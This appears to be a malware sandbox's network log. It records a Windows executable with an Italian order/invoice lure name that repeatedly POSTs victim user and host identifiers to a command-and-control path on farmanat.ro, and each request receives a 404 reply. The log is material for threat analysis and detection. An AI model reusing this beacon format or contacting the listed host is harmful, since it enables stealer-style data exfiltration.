                                              Date: Thu, 25 Nov 2021 09:53:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              65192.168.11.2049901176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:42.536148071 CET6399OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:42.570441961 CET6399OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:42.619992971 CET6399INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              650192.168.11.2050495176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:38.709614038 CET7218OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:38.742858887 CET7218OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:38.800154924 CET7219INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              651192.168.11.2050496176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:39.207844973 CET7219OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:39.242109060 CET7219OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:39.300724030 CET7220INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              652192.168.11.2050497176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:39.732608080 CET7221OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:39.766006947 CET7221OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:39.815057993 CET7221INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              653192.168.11.2050498176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:40.243963957 CET7222OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:40.277597904 CET7222OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:40.330030918 CET7223INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              654192.168.11.2050499176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:40.753144979 CET7223OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:40.787024975 CET7223OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:40.837346077 CET7224INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              655192.168.11.2050500176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:41.238327980 CET7225OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:41.272005081 CET7225OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:41.321471930 CET7225INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              656192.168.11.2050501176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:41.681848049 CET7226OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:41.715867996 CET7226OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:41.768538952 CET7226INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              657192.168.11.2050502176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:42.195312977 CET7227OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:42.229437113 CET7227OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:42.284678936 CET7228INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              658192.168.11.2050503176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:42.680123091 CET7229OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:42.714409113 CET7229OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:42.764240980 CET7229INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              659192.168.11.2050504176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:43.187163115 CET7230OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:43.220664024 CET7230OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:43.272438049 CET7230INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              66192.168.11.2049902176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:43.112375975 CET6400OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:43.145714045 CET6400OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:43.198436975 CET6401INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              660192.168.11.2050505176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:43.695677996 CET7231OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:43.729818106 CET7231OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:43.784379959 CET7232INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              661192.168.11.2050506176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:44.139014959 CET7233OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:44.173232079 CET7233OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:44.225256920 CET7233INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              662192.168.11.2050507176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:44.584131956 CET7234OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:44.617490053 CET7234OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:44.667601109 CET7234INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              663192.168.11.2050508176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:45.050530910 CET7235OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:45.084681034 CET7235OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:45.135070086 CET7236INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              664192.168.11.2050509176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:45.484127998 CET7236OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:45.518430948 CET7237OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:45.568433046 CET7237INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              665192.168.11.2050510176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:45.998078108 CET7238OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:46.031735897 CET7238OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:46.088895082 CET7238INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              666192.168.11.2050511176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:46.507064104 CET7239OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
